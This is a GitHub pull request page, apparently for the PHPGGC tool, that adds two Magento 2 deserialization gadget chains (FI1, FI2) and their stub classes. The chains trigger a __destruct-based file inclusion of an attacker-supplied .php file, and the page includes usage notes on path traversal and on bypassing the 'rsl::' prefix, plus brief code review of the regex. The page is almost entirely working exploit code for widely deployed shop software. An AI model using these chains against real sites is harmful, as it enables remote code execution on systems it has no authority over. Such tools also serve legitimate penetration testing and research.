Magento2 FI1 and FI2 #200
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| <?php | ||
|
|
||
| namespace GadgetChain\Magento2; | ||
|
|
||
| class FI1 extends \PHPGGC\GadgetChain\FileInclude | ||
| { | ||
| public static $version = '2.3.0 <= 2.4.7+'; | ||
| public static $vector = '__destruct'; | ||
| public static $author = 'mcdruid'; | ||
| public static $information = 'Your included file must end in .php | ||
| The include uses path traversal to try to get back to the docroot (typically | ||
| the "pub" directory). So the target path can be relative to that, or can use | ||
| more path traversal to resolve elsewhere. For example a target of "evil.php" | ||
| might result in include being called on: | ||
| /path/to/magento2/generated/metadata/rsl::/../../../pub/evil.php'; | ||
|
|
||
| public function process_parameters(array $parameters) | ||
| { | ||
| $parameters = parent::process_parameters($parameters); | ||
| // Remove the .php suffix if it has been specified, as it will be added | ||
| // by the application. | ||
| $parameters['remote_path'] = preg_replace('#.php$#', '', $parameters['remote_path']); | ||
| $parameters['remote_path'] = '/../../../pub/' . ltrim($parameters['remote_path'], '/'); | ||
| return $parameters; | ||
| } | ||
|
|
||
| public function generate(array $parameters) | ||
| { | ||
| return new \Magento\Framework\Cache\Backend\RemoteSynchronizedCache( | ||
| new \Magento\Framework\App\ObjectManager\ConfigLoader\Compiled(), | ||
| $parameters['remote_path'] | ||
| ); | ||
| } | ||
| } | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| <?php | ||
|
|
||
| namespace Magento\Framework\Cache\Backend { | ||
| class RemoteSynchronizedCache { | ||
| private $remote; | ||
| private $lockList = []; | ||
|
|
||
| function __construct($remote, $lockList) { | ||
| $this->remote = $remote; | ||
| $this->lockList[] = $lockList; | ||
| } | ||
| } | ||
| } | ||
|
|
||
| namespace Magento\Framework\App\ObjectManager\ConfigLoader { | ||
| class Compiled { | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change | ||||
|---|---|---|---|---|---|---|
| @@ -0,0 +1,41 @@ | ||||||
| <?php | ||||||
|
|
||||||
| namespace GadgetChain\Magento2; | ||||||
|
|
||||||
| class FI2 extends \PHPGGC\GadgetChain\FileInclude | ||||||
| { | ||||||
| public static $version = '2.4.1 <= 2.4.7+'; | ||||||
| public static $vector = '__destruct'; | ||||||
| public static $author = 'mcdruid'; | ||||||
| public static $information = 'Your included file must end in .php | ||||||
| Magento2 will add a prefix of "rsl::" to the filename. So if you specify | ||||||
| /path/to/evil.php the target file should be at /path/to/rsl::evil.php | ||||||
| A path relative to the docroot (typically "pub") should also work. | ||||||
| The path is checked with file_exists() so basic path traversal does not | ||||||
| overcome the prefixing of the filename.'; | ||||||
|
|
||||||
| public function process_parameters(array $parameters) | ||||||
| { | ||||||
| $parameters = parent::process_parameters($parameters); | ||||||
| // Remove the prefix and suffix if they have been specified, as they | ||||||
| // will be added by the application. | ||||||
| $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#', '', $parameters['remote_path']); | ||||||
|
There was a problem hiding this comment.
Suggested change
Are you sure this will remove both the prefix and the suffix if both are present? There was a problem hiding this comment. I can see why you'd ask as it seems like an OR in the pattern so perhaps only one replacement would take place.. however: I did have to check to be certain though! Good suggestion to make the patterns case-insensitive.. but I'm not positive the include would work if the prefix was supplied in the payload in uppercase. Will add the |
||||||
| return $parameters; | ||||||
| } | ||||||
|
|
||||||
| public function generate(array $parameters) | ||||||
| { | ||||||
| $file = basename($parameters['remote_path']); | ||||||
| $dir = dirname($parameters['remote_path']); | ||||||
|
|
||||||
| return new \Magento\Framework\Cache\Backend\RemoteSynchronizedCache( | ||||||
| new \Magento\Framework\Interception\PluginListGenerator( | ||||||
| new \Magento\Framework\App\Filesystem\DirectoryList( | ||||||
| $dir, | ||||||
| 'metadata' | ||||||
| ) | ||||||
| ), | ||||||
| $file | ||||||
| ); | ||||||
| } | ||||||
| } | ||||||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| <?php | ||
|
|
||
| namespace Magento\Framework\Cache\Backend { | ||
| class RemoteSynchronizedCache { | ||
| private $remote; | ||
| private $lockList = []; | ||
|
|
||
| function __construct($remote, $lockList) { | ||
| $this->remote = $remote; | ||
| $this->lockList[] = $lockList; | ||
| } | ||
| } | ||
| } | ||
|
|
||
| namespace Magento\Framework\Interception { | ||
| class PluginListGenerator { | ||
| private $directoryList; | ||
|
|
||
| function __construct($directoryList) { | ||
| $this->directoryList = $directoryList; | ||
| } | ||
| } | ||
| } | ||
|
|
||
| namespace Magento\Framework\App\Filesystem { | ||
| class DirectoryList { | ||
| private $directories; | ||
|
|
||
| function __construct($file, $id) { | ||
| $this->directories[$id]['path'] = $file; | ||
| } | ||
| } | ||
| } |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.